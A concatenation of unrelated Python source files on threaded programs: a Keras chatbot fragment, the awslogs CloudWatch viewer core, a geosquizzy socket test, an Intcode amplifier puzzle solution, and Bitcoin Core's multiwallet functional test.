time_input = Input(shape=(2,), name='time_input')
#生物钟激活函数
time_out = Dense(128, activation='sigmoid')(time_input)
#生物钟作为阀门
x = merge([lstm_out, time_out], mode='mul')
# 语言逻辑深层网络
x = Dense(128, activation='relu')(x)
# 时序言语输出
x = RepeatVector(SEN)(x)
speak_output = TimeDistributed(Dense(VOC, activation='sigmoid'),name='speak_output')(x)
#speak_output = LSTM(VOC,activation='softmax', name='speak_output',return_sequences=True)(x)
# 模型封装
model = Sequential()
model.add(Model(input=[main_input, time_input], output=speak_output))
model.compile(loss='categorical_crossentropy', optimizer='rmsprop')
#模型训练-循环控制
POWER_OFF = False
def run():
global INPUT,SPEAK_OUTPUT,POWER_OFF
while not POWER_OFF:
#读取输入数据进行训练
if len(INPUT[0]) == 0:
with rlock:
INPUT[1] = INPUT[0]
INPUT[0] = SPEAK_OUTPUT
X = s2i(INPUT[1])
Y = s2i(INPUT[0])
#读取系统时间
tm = time.localtime()
TIME_INPUT = asarray([[tm.tm_hour,tm.tm_min]],dtype=int32)
Y=zeros([1,SEN,VOC],dtype=int32)
Y[0]=to_categorical(X[0],VOC)
model.fit([X, TIME_INPUT],Y,
nb_epoch=1, batch_size=1,verbose=0)
SPEAK_OUTPUT=i2s(model.predict_classes([X,TIME_INPUT],verbose=0))
if len(SPEAK_OUTPUT)>0:
print('A: '+SPEAK_OUTPUT)
time.sleep(1)
def say():
global INPUT,SPEAK_OUTPUT,POWER_OFF
while not POWER_OFF:
a=raw_input('Q: ')
if a == u'end':
POWER_OFF = a
else:
INPUT[1] = INPUT[0]
INPUT[0] = a
threading.Thread(target = run, args = (), name = 'run').start()
threading.Thread(target = say, args = (), name = 'say').start()
|
core.py
|
import re
import sys
import os
import time
from threading import Thread, Event
from datetime import datetime, timedelta
from collections import deque
try:
from Queue import Queue
except ImportError:
from queue import Queue
import boto3
from botocore.compat import total_seconds
from termcolor import colored
from dateutil.parser import parse
from . import exceptions
__version__ = '0.3.0'
def milis2iso(milis):
res = datetime.utcfromtimestamp(milis/1000.0).isoformat()
return (res + ".000")[:23] + 'Z'
class AWSLogs(object):
ACTIVE = 1
EXHAUSTED = 2
WATCH_SLEEP = 2
FILTER_LOG_EVENTS_STREAMS_LIMIT = 100
MAX_EVENTS_PER_CALL = 10000
ALL_WILDCARD = 'ALL'
def __init__(self, **kwargs):
self.aws_region = kwargs.get('aws_region')
self.aws_access_key_id = kwargs.get('aws_access_key_id')
self.aws_secret_access_key = kwargs.get('aws_secret_access_key')
self.aws_session_token = kwargs.get('aws_session_token')
self.log_group_name = kwargs.get('log_group_name')
self.log_stream_name = kwargs.get('log_stream_name')
self.filter_pattern = kwargs.get('filter_pattern')
self.watch = kwargs.get('watch')
self.color_enabled = kwargs.get('color_enabled')
self.output_stream_enabled = kwargs.get('output_stream_enabled')
self.output_group_enabled = kwargs.get('output_group_enabled')
self.output_timestamp_enabled = kwargs.get('output_timestamp_enabled')
self.output_ingestion_time_enabled = kwargs.get(
'output_ingestion_time_enabled')
self.start = self.parse_datetime(kwargs.get('start'))
self.end = self.parse_datetime(kwargs.get('end'))
self.client = boto3.client(
'logs',
aws_access_key_id=self.aws_access_key_id,
aws_secret_access_key=self.aws_secret_access_key,
aws_session_token=self.aws_session_token,
region_name=self.aws_region
)
def _get_streams_from_pattern(self, group, pattern):
"""Returns streams in ``group`` matching ``pattern``."""
pattern = '.*' if pattern == self.ALL_WILDCARD else pattern
reg = re.compile('^{0}'.format(pattern))
for stream in self.get_streams(group):
if re.match(reg, stream):
yield stream
def list_logs(self):
streams = []
if self.log_stream_name != self.ALL_WILDCARD:
streams = list(self._get_streams_from_pattern(self.log_group_name, self.log_stream_name))
if len(streams) > self.FILTER_LOG_EVENTS_STREAMS_LIMIT:
raise exceptions.TooManyStreamsFilteredError(
self.log_stream_name,
len(streams),
self.FILTER_LOG_EVENTS_STREAMS_LIMIT
)
max_stream_length = max([len(s) for s in streams]) if streams else 10
group_length = len(self.log_group_name)
queue, exit = Queue(), Event()
# Note: filter_log_events paginator is broken
# ! Error during pagination: The same next token was received twice
def consumer():
while not exit.is_set():
event = queue.get()
if event is None:
exit.set()
break
output = []
if self.output_group_enabled:
output.append(
self.color(
self.log_group_name.ljust(group_length, ' '),
'green'
)
)
if self.output_stream_enabled:
output.append(
self.color(
event['logStreamName'].ljust(max_stream_length,
' '),
'cyan'
)
)
if self.output_timestamp_enabled:
output.append(
self.color(
milis2iso(event['timestamp']),
'yellow'
)
)
if self.output_ingestion_time_enabled:
output.append(
self.color(
milis2iso(event['ingestionTime']),
'blue'
)
)
output.append(event['message'])
print(' '.join(output))
def generator():
"""Push events into queue trying to deduplicate them using a lru queue.
AWS API stands for the interleaved parameter that:
interleaved (boolean) -- If provided, the API will make a best
effort to provide responses that contain events from multiple
log streams within the log group interleaved in a single
response. That makes some responses return some subsequent
response duplicate events. In a similar way when awslogs is
called with --watch option, we need to findout which events we
have alredy put in the queue in order to not do it several
times while waiting for new ones and reusing the same
next_token. The site of this queue is MAX_EVENTS_PER_CALL in
order to not exhaust the memory.
"""
interleaving_sanity = deque(maxlen=self.MAX_EVENTS_PER_CALL)
kwargs = {'logGroupName': self.log_group_name,
'interleaved': True}
if streams:
kwargs['logStreamNames'] = streams
if self.start:
kwargs['startTime'] = self.start
if self.end:
kwargs['endTime'] = self.end
if self.filter_pattern:
kwargs['filterPattern'] = self.filter_pattern
while not exit.is_set():
response = self.client.filter_log_events(**kwargs)
for event in response.get('events', []):
if event['eventId'] not in interleaving_sanity:
interleaving_sanity.append(event['eventId'])
queue.put(event)
if 'nextToken' in response:
kwargs['nextToken'] = response['nextToken']
else:
if self.watch:
time.sleep(1)
else:
queue.put(None)
break
g = Thread(target=generator)
g.start()
c = Thread(target=consumer)
c.start()
try:
while not exit.is_set():
time.sleep(.1)
except (KeyboardInterrupt, SystemExit):
exit.set()
print('Closing...\n')
os._exit(0)
def list_groups(self):
"""Lists available CloudWatch logs groups"""
for group in self.get_groups():
print(group)
def list_streams(self):
"""Lists available CloudWatch logs streams in ``log_group_name``."""
for stream in self.get_streams():
print(stream)
def get_groups(self):
"""Returns available CloudWatch logs groups"""
paginator = self.client.get_paginator('describe_log_groups')
for page in paginator.paginate():
for group in page.get('logGroups', []):
yield group['logGroupName']
def get_streams(self, log_group_name=None):
"""Returns available CloudWatch logs streams in ``log_group_name``."""
kwargs = {'logGroupName': log_group_name or self.log_group_name}
window_start = self.start or 0
window_end = self.end or sys.float_info.max
paginator = self.client.get_paginator('describe_log_streams')
for page in paginator.paginate(**kwargs):
for stream in page.get('logStreams', []):
if 'firstEventTimestamp' not in stream:
# This is a specified log stream rather than
# a filter on the whole log group, so there's
# no firstEventTimestamp.
yield stream['logStreamName']
elif max(stream['firstEventTimestamp'], window_start) <= \
min(stream['lastEventTimestamp'], window_end):
yield stream['logStreamName']
def color(self, text, color):
"""Returns coloured version of ``text`` if ``color_enabled``."""
if self.color_enabled:
return colored(text, color)
return text
def parse_datetime(self, datetime_text):
"""Parse ``datetime_text`` into a ``datetime``."""
if not datetime_text:
return None
ago_regexp = r'(\d+)\s?(m|minute|minutes|h|hour|hours|d|day|days|w|weeks|weeks)(?: ago)?'
ago_match = re.match(ago_regexp, datetime_text)
if ago_match:
amount, unit = ago_match.groups()
amount = int(amount)
unit = {'m': 60, 'h': 3600, 'd': 86400, 'w': 604800}[unit[0]]
date = datetime.utcnow() + timedelta(seconds=unit * amount * -1)
else:
try:
date = parse(datetime_text)
except ValueError:
raise exceptions.UnknownDateError(datetime_text)
return int(total_seconds(date - datetime(1970, 1, 1))) * 1000
|
integrationtestSocket.py
|
#!/usr/bin/env python3.3.6
import unittest
import sys
import threading
import queue
import time
from socket import AF_INET, SOCK_STREAM
from geosquizzy.gs_socket.gs_client import GsSocketClient
from geosquizzy.gs_socket.gs_server import GsSocketServer
from geosquizzy.geosquizzy import GeoSquizzy
from tests.getdata import get_geojson
class SocketClientServerConnectionTest(unittest.TestCase):
"""
Testing interactions between server/clients during geosquizzy algorithm execution
"""
def setUp(self):
self.socket_options = {'HOST': 'localhost',
'PORT': 8030,
'FAMILY': AF_INET,
'TYPE': SOCK_STREAM,
'CONNECTIONS': 2}
self.socket_client = GsSocketClient(**self.socket_options)
self.socket_server = GsSocketServer(**self.socket_options)
self.geojson_options = {'geojson_options': {'mode': 'static', 'geojson_type': 'FeatureCollection'},
'outcome_options': {},
'optim': {'batch': 1, 'loss': -5.0},
'socket_options': self.socket_options
}
self.data = get_geojson(path="/home/ing/PycharmProjects/geo-squizzy/"
"geosquizzy/build_big_data/data/dump1000.json")
def tearDown(self):
pass
def test_geosquizzy_sockets(self):
"""
It testing listening to messages broadcasted by socket server(which receive it from geosquizzy algorithm
client) by another client
"""
# Starting server thread
self.socket_server.create_connection()
server_thread = threading.Thread(target=self.socket_server.run)
server_thread.daemon = True
server_thread.start()
second_client_data = queue.Queue()
def second_client_listen(client, q):
while True:
data = client.read(1024)
if data:
q.put(str(data, 'utf-8'))
q.task_done()
else:
break
time.sleep(0.5)
# Starting second client thread
self.socket_client.connect()
second_client_thread = threading.Thread(target=second_client_listen,
args=(self.socket_client, second_client_data))
second_client_thread.start()
# Starting geosquizzy socket client and algorithm execution
self.geosquizzy = GeoSquizzy(**self.geojson_options)
self.geosquizzy.start(geojson=self.data)
# self.socket_client.disconnect()
time.sleep(0.5)
self.socket_client.disconnect()
# Waiting for second_client to receive all data
second_client_thread.join()
# Waiting for second_client data
second_client_data.join()
# Getting second client
second_client_res = []
while True:
if not second_client_data.empty():
val = second_client_data.get()
if bool(val):
val = eval(val)
second_client_res = second_client_res + val
else:
break
# Getting geosquizzy result
geosquizzy_res = self.geosquizzy.get_results()
# Compare test
org_len = len(geosquizzy_res)
sock_len = 0
for x in geosquizzy_res:
for y in second_client_res:
if y['keys'] == x['keys']:
sock_len += 1
break
# [print(x, '\n') for x in geosquizzy_res]
# [print(x, '\n') for x in second_client_res]
# TODO difference is with one key, which is gathered after leaving features array
self.assertTrue(org_len-1 == sock_len)
def test_suite():
return unittest.findTestCases(sys.modules[__name__])
if __name__ == '__main__':
unittest.main(defaultTest='test_suite')
|
part2.py
|
import threading
import time
from itertools import permutations
class AmplifierController:
def get_value(self, index, mode, program):
if mode == "0":
return program[program[index]]
return program[index]
def run_program(self, program, I):
i = 0
while i < len(program):
opcode = str(program[i])[::-1] + '0' * (5 - len(str(program[i])))
if int(opcode[:2][::-1]) == 99:
self.outputs[I] = self.queues[(I+1) % 5]
return
elif int(opcode[:2][::-1]) == 1:
program[program[i+3]] = self.get_value(i+1, opcode[2], program) + self.get_value(i+2, opcode[3], program)
i += 4
elif int(opcode[:2][::-1]) == 2:
program[program[i+3]] = self.get_value(i+1, opcode[2], program) * self.get_value(i+2, opcode[3], program)
i += 4
elif int(opcode[:2][::-1]) == 3:
while not self.queues[I]:
time.sleep(0.0000001)
program[program[i+1]] = self.queues[I].pop(0)
i += 2
elif int(opcode[:2][::-1]) == 4:
self.queues[(I+1) % 5].append(self.get_value(i+1, opcode[2], program))
i += 2
elif int(opcode[:2][::-1]) == 5:
i = self.get_value(i+2, opcode[3], program) if self.get_value(i+1, opcode[2], program) != 0 else i + 3
elif int(opcode[:2][::-1]) == 6:
i = self.get_value(i+2, opcode[3], program) if self.get_value(i+1, opcode[2], program) == 0 else i + 3
elif int(opcode[:2][::-1]) == 7:
program[program[i+3]] = 1 if self.get_value(i+1, opcode[2], program) < self.get_value(i+2, opcode[3], program) else 0
i += 4
elif int(opcode[:2][::-1]) == 8:
program[program[i+3]] = 1 if self.get_value(i+1, opcode[2], program) == self.get_value(i+2, opcode[3], program) else 0
i += 4
else:
raise("Invalid opcode: {}".format(opcode))
def run_simulation(self, program, phase_settings):
self.outputs, threads = {}, {}
self.queues = {i: [x] for i, x in enumerate(phase_settings)}
self.queues[0].append(0)
for i in range(5):
thr = threading.Thread(target=self.run_program, args=(program.copy(), i))
threads[i] = thr
thr.start()
for i in range(5):
threads[i].join()
return self.outputs[4][0]
def main(self, program):
program = list(map(int, program.strip().split(",")))
phase_settings = permutations(range(5, 10), 5)
return max([self.run_simulation(program.copy(), phase_setting) for phase_setting in phase_settings])
if __name__ == "__main__":
with open("input.txt", "r") as f:
program = f.read()
print(AmplifierController().main(program))
|
wallet_multiwallet.py
|
#!/usr/bin/env python3
# Copyright (c) 2017-2020 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test multiwallet.
Verify that a bitcoind node can load multiple wallet files
"""
from decimal import Decimal
from threading import Thread
import os
import shutil
import stat
import time
from test_framework.authproxy import JSONRPCException
from test_framework.test_framework import BitcoinTestFramework
from test_framework.test_node import ErrorMatch
from test_framework.util import (
assert_equal,
assert_raises_rpc_error,
get_rpc_proxy,
)
got_loading_error = False
def test_load_unload(node, name):
global got_loading_error
while True:
if got_loading_error:
return
try:
node.loadwallet(name)
node.unloadwallet(name)
except JSONRPCException as e:
if e.error['code'] == -4 and 'Wallet already being loading' in e.error['message']:
got_loading_error = True
return
class MultiWalletTest(BitcoinTestFramework):
def set_test_params(self):
self.setup_clean_chain = True
self.num_nodes = 2
self.rpc_timeout = 120
self.extra_args = [["-nowallet"], []]
def skip_test_if_missing_module(self):
self.skip_if_no_wallet()
def add_options(self, parser):
parser.add_argument(
'--data_wallets_dir',
default=os.path.join(os.path.dirname(os.path.realpath(__file__)), 'data/wallets/'),
help='Test data with wallet directories (default: %(default)s)',
)
def run_test(self):
node = self.nodes[0]
data_dir = lambda *p: os.path.join(node.datadir, self.chain, *p)
wallet_dir = lambda *p: data_dir('wallets', *p)
wallet = lambda name: node.get_wallet_rpc(name)
def wallet_file(name):
if name == self.default_wallet_name:
return wallet_dir(self.default_wallet_name, self.wallet_data_filename)
if os.path.isdir(wallet_dir(name)):
return wallet_dir(name, "wallet.dat")
return wallet_dir(name)
assert_equal(self.nodes[0].listwalletdir(), {'wallets': [{'name': self.default_wallet_name}]})
# check wallet.dat is created
self.stop_nodes()
assert_equal(os.path.isfile(wallet_dir(self.default_wallet_name, self.wallet_data_filename)), True)
# create symlink to verify wallet directory path can be referenced
# through symlink
os.mkdir(wallet_dir('w7'))
os.symlink('w7', wallet_dir('w7_symlink'))
os.symlink('..', wallet_dir('recursive_dir_symlink'))
os.mkdir(wallet_dir('self_walletdat_symlink'))
os.symlink('wallet.dat', wallet_dir('self_walletdat_symlink/wallet.dat'))
# rename wallet.dat to make sure plain wallet file paths (as opposed to
# directory paths) can be loaded
# create another dummy wallet for use in testing backups later
self.start_node(0)
node.createwallet("empty")
node.createwallet("plain")
node.createwallet("created")
self.stop_nodes()
empty_wallet = os.path.join(self.options.tmpdir, 'empty.dat')
os.rename(wallet_file("empty"), empty_wallet)
shutil.rmtree(wallet_dir("empty"))
empty_created_wallet = os.path.join(self.options.tmpdir, 'empty.created.dat')
os.rename(wallet_dir("created", self.wallet_data_filename), empty_created_wallet)
shutil.rmtree(wallet_dir("created"))
os.rename(wallet_file("plain"), wallet_dir("w8"))
shutil.rmtree(wallet_dir("plain"))
# restart node with a mix of wallet names:
# w1, w2, w3 - to verify new wallets created when non-existing paths specified
# w - to verify wallet name matching works when one wallet path is prefix of another
# sub/w5 - to verify relative wallet path is created correctly
# extern/w6 - to verify absolute wallet path is created correctly
# w7_symlink - to verify symlinked wallet path is initialized correctly
# w8 - to verify existing wallet file is loaded correctly. Not tested for SQLite wallets as this is a deprecated BDB behavior.
# '' - to verify default wallet file is created correctly
to_create = ['w1', 'w2', 'w3', 'w', 'sub/w5', 'w7_symlink']
in_wallet_dir = [w.replace('/', os.path.sep) for w in to_create] # Wallets in the wallet dir
in_wallet_dir.append('w7') # w7 is not loaded or created, but will be listed by listwalletdir because w7_symlink
to_create.append(os.path.join(self.options.tmpdir, 'extern/w6')) # External, not in the wallet dir, so we need to avoid adding it to in_wallet_dir
to_load = [self.default_wallet_name]
if not self.options.descriptors:
to_load.append('w8')
wallet_names = to_create + to_load # Wallet names loaded in the wallet
in_wallet_dir += to_load # The loaded wallets are also in the wallet dir
self.start_node(0)
for wallet_name in to_create:
self.nodes[0].createwallet(wallet_name)
for wallet_name in to_load:
self.nodes[0].loadwallet(wallet_name)
os.mkdir(wallet_dir('no_access'))
os.chmod(wallet_dir('no_access'), 0)
try:
with self.nodes[0].assert_debug_log(expected_msgs=['Error scanning']):
walletlist = self.nodes[0].listwalletdir()['wallets']
finally:
# Need to ensure access is restored for cleanup
os.chmod(wallet_dir('no_access'), stat.S_IRUSR | stat.S_IWUSR | stat.S_IXUSR)
assert_equal(sorted(map(lambda w: w['name'], walletlist)), sorted(in_wallet_dir))
assert_equal(set(node.listwallets()), set(wallet_names))
# should raise rpc error if wallet path can't be created
err_code = -4 if self.options.descriptors else -1
assert_raises_rpc_error(err_code, "boost::filesystem::create_directory:", self.nodes[0].createwallet, "w8/bad")
# check that all requested wallets were created
self.stop_node(0)
for wallet_name in wallet_names:
assert_equal(os.path.isfile(wallet_file(wallet_name)), True)
self.nodes[0].assert_start_raises_init_error(['-walletdir=wallets'], 'Error: Specified -walletdir "wallets" does not exist')
self.nodes[0].assert_start_raises_init_error(['-walletdir=wallets'], 'Error: Specified -walletdir "wallets" is a relative path', cwd=data_dir())
self.nodes[0].assert_start_raises_init_error(['-walletdir=debug.log'], 'Error: Specified -walletdir "debug.log" is not a directory', cwd=data_dir())
self.start_node(0, ['-wallet=w1', '-wallet=w1'])
self.stop_node(0, 'Warning: Ignoring duplicate -wallet w1.')
if not self.options.descriptors:
# Only BDB doesn't open duplicate wallet files. SQLite does not have this limitation. While this may be desired in the future, it is not necessary
# should not initialize if one wallet is a copy of another
shutil.copyfile(wallet_dir('w8'), wallet_dir('w8_copy'))
in_wallet_dir.append('w8_copy')
exp_stderr = r"BerkeleyDatabase: Can't open database w8_copy \(duplicates fileid \w+ from w8\)"
self.nodes[0].assert_start_raises_init_error(['-wallet=w8', '-wallet=w8_copy'], exp_stderr, match=ErrorMatch.PARTIAL_REGEX)
# should not initialize if wallet file is a symlink
os.symlink('w8', wallet_dir('w8_symlink'))
self.nodes[0].assert_start_raises_init_error(['-wallet=w8_symlink'], r'Error: Invalid -wallet path \'w8_symlink\'\. .*', match=ErrorMatch.FULL_REGEX)
# should not initialize if the specified walletdir does not exist
self.nodes[0].assert_start_raises_init_error(['-walletdir=bad'], 'Error: Specified -walletdir "bad" does not exist')
# should not initialize if the specified walletdir is not a directory
not_a_dir = wallet_dir('notadir')
open(not_a_dir, 'a', encoding="utf8").close()
self.nodes[0].assert_start_raises_init_error(['-walletdir=' + not_a_dir], 'Error: Specified -walletdir "' + not_a_dir + '" is not a directory')
self.log.info("Do not allow -upgradewallet with multiwallet")
self.nodes[0].assert_start_raises_init_error(['-upgradewallet'], "Error: Error parsing command line arguments: Invalid parameter -upgradewallet")
# if wallets/ doesn't exist, datadir should be the default wallet dir
wallet_dir2 = data_dir('walletdir')
os.rename(wallet_dir(), wallet_dir2)
self.start_node(0)
self.nodes[0].createwallet("w4")
self.nodes[0].createwallet("w5")
assert_equal(set(node.listwallets()), {"w4", "w5"})
w5 = wallet("w5")
node.generatetoaddress(nblocks=1, address=w5.getnewaddress())
# now if wallets/ exists again, but the rootdir is specified as the walletdir, w4 and w5 should still be loaded
os.rename(wallet_dir2, wallet_dir())
self.restart_node(0, ['-nowallet', '-walletdir=' + data_dir()])
self.nodes[0].loadwallet("w4")
self.nodes[0].loadwallet("w5")
assert_equal(set(node.listwallets()), {"w4", "w5"})
w5 = wallet("w5")
w5_info = w5.getwalletinfo()
assert_equal(w5_info['immature_balance'], 50)
competing_wallet_dir = os.path.join(self.options.tmpdir, 'competing_walletdir')
os.mkdir(competing_wallet_dir)
self.restart_node(0, ['-nowallet', '-walletdir=' + competing_wallet_dir])
self.nodes[0].createwallet(self.default_wallet_name)
if self.options.descriptors:
exp_stderr = r"Error: SQLiteDatabase: Unable to obtain an exclusive lock on the database, is it being used by another bitcoind?"
else:
exp_stderr = r"Error: Error initializing wallet database environment \"\S+competing_walletdir\S*\"!"
self.nodes[1].assert_start_raises_init_error(['-walletdir=' + competing_wallet_dir], exp_stderr, match=ErrorMatch.PARTIAL_REGEX)
self.restart_node(0)
for wallet_name in wallet_names:
self.nodes[0].loadwallet(wallet_name)
assert_equal(sorted(map(lambda w: w['name'], self.nodes[0].listwalletdir()['wallets'])), sorted(in_wallet_dir))
wallets = [wallet(w) for w in wallet_names]
wallet_bad = wallet("bad")
# check wallet names and balances
node.generatetoaddress(nblocks=1, address=wallets[0].getnewaddress())
for wallet_name, wallet in zip(wallet_names, wallets):
info = wallet.getwalletinfo()
assert_equal(info['immature_balance'], 50 if wallet is wallets[0] else 0)
assert_equal(info['walletname'], wallet_name)
# accessing invalid wallet fails
assert_raises_rpc_error(-18, "Requested wallet does not exist or is not loaded", wallet_bad.getwalletinfo)
# accessing wallet RPC without using wallet endpoint fails
assert_raises_rpc_error(-19, "Wallet file not specified", node.getwalletinfo)
w1, w2, w3, w4, *_ = wallets
node.generatetoaddress(nblocks=101, address=w1.getnewaddress())
assert_equal(w1.getbalance(), 100)
assert_equal(w2.getbalance(), 0)
assert_equal(w3.getbalance(), 0)
assert_equal(w4.getbalance(), 0)
w1.sendtoaddress(w2.getnewaddress(), 1)
w1.sendtoaddress(w3.getnewaddress(), 2)
w1.sendtoaddress(w4.getnewaddress(), 3)
node.generatetoaddress(nblocks=1, address=w1.getnewaddress())
assert_equal(w2.getbalance(), 1)
assert_equal(w3.getbalance(), 2)
assert_equal(w4.getbalance(), 3)
batch = w1.batch([w1.getblockchaininfo.get_request(), w1.getwalletinfo.get_request()])
assert_equal(batch[0]["result"]["chain"], self.chain)
assert_equal(batch[1]["result"]["walletname"], "w1")
self.log.info('Check for per-wallet settxfee call')
assert_equal(w1.getwalletinfo()['paytxfee'], 0)
assert_equal(w2.getwalletinfo()['paytxfee'], 0)
w2.settxfee(0.001)
assert_equal(w1.getwalletinfo()['paytxfee'], 0)
assert_equal(w2.getwalletinfo()['paytxfee'], Decimal('0.00100000'))
self.log.info("Test dynamic wallet loading")
self.restart_node(0, ['-nowallet'])
assert_equal(node.listwallets(), [])
assert_raises_rpc_error(-18, "No wallet is loaded. Load a wallet using loadwallet or create a new one with createwallet. (Note: A default wallet is no longer automatically created)", node.getwalletinfo)
self.log.info("Load first wallet")
loadwallet_name = node.loadwallet(wallet_names[0])
assert_equal(loadwallet_name['name'], wallet_names[0])
assert_equal(node.listwallets(), wallet_names[0:1])
node.getwalletinfo()
w1 = node.get_wallet_rpc(wallet_names[0])
w1.getwalletinfo()
self.log.info("Load second wallet")
loadwallet_name = node.loadwallet(wallet_names[1])
assert_equal(loadwallet_name['name'], wallet_names[1])
assert_equal(node.listwallets(), wallet_names[0:2])
assert_raises_rpc_error(-19, "Wallet file not specified", node.getwalletinfo)
w2 = node.get_wallet_rpc(wallet_names[1])
w2.getwalletinfo()
self.log.info("Concurrent wallet loading")
threads = []
for _ in range(3):
n = node.cli if self.options.usecli else get_rpc_proxy(node.url, 1, timeout=600, coveragedir=node.coverage_dir)
t = Thread(target=test_load_unload, args=(n, wallet_names[2]))
t.start()
threads.append(t)
for t in threads:
t.join()
global got_loading_error
assert_equal(got_loading_error, True)
self.log.info("Load remaining wallets")
for wallet_name in wallet_names[2:]:
loadwallet_name = self.nodes[0].loadwallet(wallet_name)
assert_equal(loadwallet_name['name'], wallet_name)
assert_equal(set(self.nodes[0].listwallets()), set(wallet_names))
# Fail to load if wallet doesn't exist
path = os.path.join(self.options.tmpdir, "node0", "regtest", "wallets", "wallets")
assert_raises_rpc_error(-18, "Wallet file verification failed. Failed to load database path '{}'. Path does not exist.".format(path), self.nodes[0].loadwallet, 'wallets')
# Fail to load duplicate wallets
path = os.path.join(self.options.tmpdir, "node0", "regtest", "wallets", "w1", "wallet.dat")
if self.options.descriptors:
assert_raises_rpc_error(-4, "Wallet file verification failed. SQLiteDatabase: Unable to obtain an exclusive lock on the database, is it being used by another bitcoind?", self.nodes[0].loadwallet, wallet_names[0])
else:
assert_raises_rpc_error(-4, "Wallet file verification failed. Refusing to load database. Data file '{}' is already loaded.".format(path), self.nodes[0].loadwallet, wallet_names[0])
# This tests the default wallet that BDB makes, so SQLite wallet doesn't need to test this
# Fail to load duplicate wallets by different ways (directory and filepath)
path = os.path.join(self.options.tmpdir, "node0", "regtest", "wallets", "wallet.dat")
assert_raises_rpc_error(-4, "Wallet file verification failed. Refusing to load database. Data file '{}' is already loaded.".format(path), self.nodes[0].loadwallet, 'wallet.dat')
# Only BDB doesn't open duplicate wallet files. SQLite does not have this limitation. While this may be desired in the future, it is not necessary
# Fail to load if one wallet is a copy of another
assert_raises_rpc_error(-4, "BerkeleyDatabase: Can't open database w8_copy (duplicates fileid", self.nodes[0].loadwallet, 'w8_copy')
# Fail to load if one wallet is a copy of another, test this twice to make sure that we don't re-introduce #14304
assert_raises_rpc_error(-4, "BerkeleyDatabase: Can't open database w8_copy (duplicates fileid", self.nodes[0].loadwallet, 'w8_copy')
# Fail to load if wallet file is a symlink
assert_raises_rpc_error(-4, "Wallet file verification failed. Invalid -wallet path 'w8_symlink'", self.nodes[0].loadwallet, 'w8_symlink')
# Fail to load if a directory is specified that doesn't contain a wallet
os.mkdir(wallet_dir('empty_wallet_dir'))
path = os.path.join(self.options.tmpdir, "node0", "regtest", "wallets", "empty_wallet_dir")
assert_raises_rpc_error(-18, "Wallet file verification failed. Failed to load database path '{}'. Data is not in recognized format.".format(path), self.nodes[0].loadwallet, 'empty_wallet_dir')
self.log.info("Test dynamic wallet creation.")
# Fail to create a wallet if it already exists.
path = os.path.join(self.options.tmpdir, "node0", "regtest", "wallets", "w2")
assert_raises_rpc_error(-4, "Failed to create database path '{}'. Database already exists.".format(path), self.nodes[0].createwallet, 'w2')
# Successfully create a wallet with a new name
loadwallet_name = self.nodes[0].createwallet('w9')
in_wallet_dir.append('w9')
assert_equal(loadwallet_name['name'], 'w9')
w9 = node.get_wallet_rpc('w9')
assert_equal(w9.getwalletinfo()['walletname'], 'w9')
assert 'w9' in self.nodes[0].listwallets()
# Successfully create a wallet using a full path
new_wallet_dir = os.path.join(self.options.tmpdir, 'new_walletdir')
new_wallet_name = os.path.join(new_wallet_dir, 'w10')
loadwallet_name = self.nodes[0].createwallet(new_wallet_name)
assert_equal(loadwallet_name['name'], new_wallet_name)
w10 = node.get_wallet_rpc(new_wallet_name)
assert_equal(w10.getwalletinfo()['walletname'], new_wallet_name)
assert new_wallet_name in self.nodes[0].listwallets()
self.log.info("Test dynamic wallet unloading")
# Test `unloadwallet` errors
assert_raises_rpc_error(-1, "JSON value is not a string as expected", self.nodes[0].unloadwallet)
assert_raises_rpc_error(-18, "Requested wallet does not exist or is not loaded", self.nodes[0].unloadwallet, "dummy")
assert_raises_rpc_error(-18, "Requested wallet does not exist or is not loaded", node.get_wallet_rpc("dummy").unloadwallet)
assert_raises_rpc_error(-8, "RPC endpoint wallet and wallet_name parameter specify different wallets", w1.unloadwallet, "w2"),
# Successfully unload the specified wallet name
self.nodes[0].unloadwallet("w1")
assert 'w1' not in self.nodes[0].listwallets()
# Unload w1 again, this time providing the wallet name twice
self.nodes[0].loadwallet("w1")
assert 'w1' in self.nodes[0].listwallets()
w1.unloadwallet("w1")
assert 'w1' not in self.nodes[0].listwallets()
# Successfully unload the wallet referenced by the request endpoint
# Also ensure unload works during walletpassphrase timeout
w2.encryptwallet('test')
w2.walletpassphrase('test', 1)
w2.unloadwallet()
time.sleep(1.1)
assert 'w2' not in self.nodes[0].listwallets()
# Successfully unload all wallets
for wallet_name in self.nodes[0].listwallets():
self.nodes[0].unloadwallet(wallet_name)
assert_equal(self.nodes[0].listwallets(), [])
assert_raises_rpc_error(-18, "No wallet is loaded. Load a wallet using loadwallet or create a new one with createwallet. (Note: A default wallet is no longer automatically created)", self.nodes[0].getwalletinfo)
# Successfully load a previously unloaded wallet
self.nodes[0].loadwallet('w1')
assert_equal(self.nodes[0].listwallets(), ['w1'])
assert_equal(w1.getwalletinfo()['walletname'], 'w1')
assert_equal(sorted(map(lambda w: w['name'], self.nodes[0].listwalletdir()['wallets'])), sorted(in_wallet_dir))
# Test backing up and restoring wallets
self.log.info("Test wallet backup")
self.restart_node(0, ['-nowallet'])
for wallet_name in wallet_names:
self.nodes[0].loadwallet(wallet_name)
for wallet_name in wallet_names:
rpc = self.nodes[0].get_wallet_rpc(wallet_name)
addr = rpc.getnewaddress()
backup = os.path.join(self.options.tmpdir, 'backup.dat')
if os.path.exists(backup):
os.unlink(backup)
rpc.backupwallet(backup)
self.nodes[0].unloadwallet(wallet_name)
shutil.copyfile(empty_created_wallet if wallet_name == self.default_wallet_name else empty_wallet, wallet_file(wallet_name))
self.nodes[0].loadwallet(wallet_name)
assert_equal(rpc.getaddressinfo(addr)['ismine'], False)
self.nodes[0].unloadwallet(wallet_name)
shutil.copyfile(backup, wallet_file(wallet_name))
self.nodes[0].loadwallet(wallet_name)
assert_equal(rpc.getaddressinfo(addr)['ismine'], True)
# Test .walletlock file is closed
self.start_node(1)
wallet = os.path.join(self.options.tmpdir, 'my_wallet')
self.nodes[0].createwallet(wallet)
if self.options.descriptors:
assert_raises_rpc_error(-4, "Unable to obtain an exclusive lock", self.nodes[1].loadwallet, wallet)
else:
assert_raises_rpc_error(-4, "Error initializing wallet database environment", self.nodes[1].loadwallet, wallet)
self.nodes[0].unloadwallet(wallet)
self.nodes[1].loadwallet(wallet)
if __name__ == '__main__':
MultiWalletTest().main()
|
threaded.py
|
''' threaded.py
Threaded command module
Copyright 2008 Corey Tabaka
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
